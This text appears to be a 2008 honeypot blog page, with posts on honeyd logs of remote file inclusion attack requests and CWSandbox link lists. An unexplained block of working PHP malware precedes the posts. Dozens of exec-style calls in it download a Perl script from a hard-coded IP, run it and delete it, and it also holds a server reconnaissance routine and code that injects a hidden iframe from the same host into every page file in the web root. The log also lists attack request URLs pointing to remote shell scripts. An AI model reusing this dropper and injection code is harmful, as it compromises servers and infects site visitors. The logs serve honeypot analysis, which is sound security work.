@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
?>
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "AnakDompu<br />";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "AnakDompu Was Here!!<br />";
echo "uname -a: $un<br />";
echo "os: $os<br />";
echo "uptime: $up<br />";
echo "id: $id1<br />";
echo "pwd: $pwd1<br />";
echo "php: $php1<br />";
echo "software: $sof1<br />";
echo "server-name: $name1<br />";
echo "server-ip: $ip1<br />";
echo "free: $free<br />";
echo "used: $used<br />";
echo "total: $all<br />";
exit;
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src="http://203.113.6.34/adu/home.html"
width="0" height="0" frameborder="0"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];
foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>
Tuesday, June 17. 2008
[honeyd] RFI bots?
I am currently writing a few filter scripts to evaluate the honeyd logs.
Here is a sample result from a script that simply filters for 'GET' and '=http' and 'not honey_domain' and 'not Referer':
CODE:
"GET /test.php?page=http://www.webhostmedic.com/p.c? HTTP/1.1
"GET //errors.php?error=http://www.bbs-bad-harzburg.de/contenido//contenido/includes/sistem.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET //errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.indicce.com/admin/r57.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://blog.me.lit.edu.tw/adu/id.txt?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/test.txt??? HTTP/1.1
"GET /index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://www.dutadewata.com/image/foto/safe.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://petersontrial.info/poll/muie/idpoi.txt?%0D?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET //doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc/index.php?option=com_custompages&cpage=http://trendbiz.ro/user_media/logo/images/bid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.fundacenafv.gob.ve/portal/beleaid.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/albid.txt??? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://nozyk.org/rob.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://fsm.upsi.edu.my/db/31337.txt?? HTTP/1.1
"GET /?option=com_custompages&cpage=http://www.michelangeloservice.it/cache/ec.txt? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1
"GET //pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://201.6.243.67/UP/xs.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc//index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET //index.php?option=com_custompages&cpage=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1
"GET /doc///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET ///index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://piauibrlink.web44.net/test.txt??? HTTP/1.1
"GET /contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc/contact.php?cal_dir=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
GET /doc//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /doc/about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET /about.php?option=com_custompages&cpage=http://www.joerg-krug.de/vnc/test.txt??? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
"GET ////index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1
Some people should really fix their scripts ;)
The corresponding files on www.joerg-krug.de have already been removed. I have not tried the others. Have fun. :)
Saturday, June 14. 2008
[sandbox] CWSandbox - current list
The current list of requests that reached me because of a faulty link in the CWSandbox e-mails can be found here from now on: CWSandbox list. The list contains all requests with corrected URLs.
Sunday, June 8. 2008
[sandbox] CWS link list
Thanks to honeyd, yourwebinterface.comy, grep and awk I have put together a list of the links that have hit me so far.
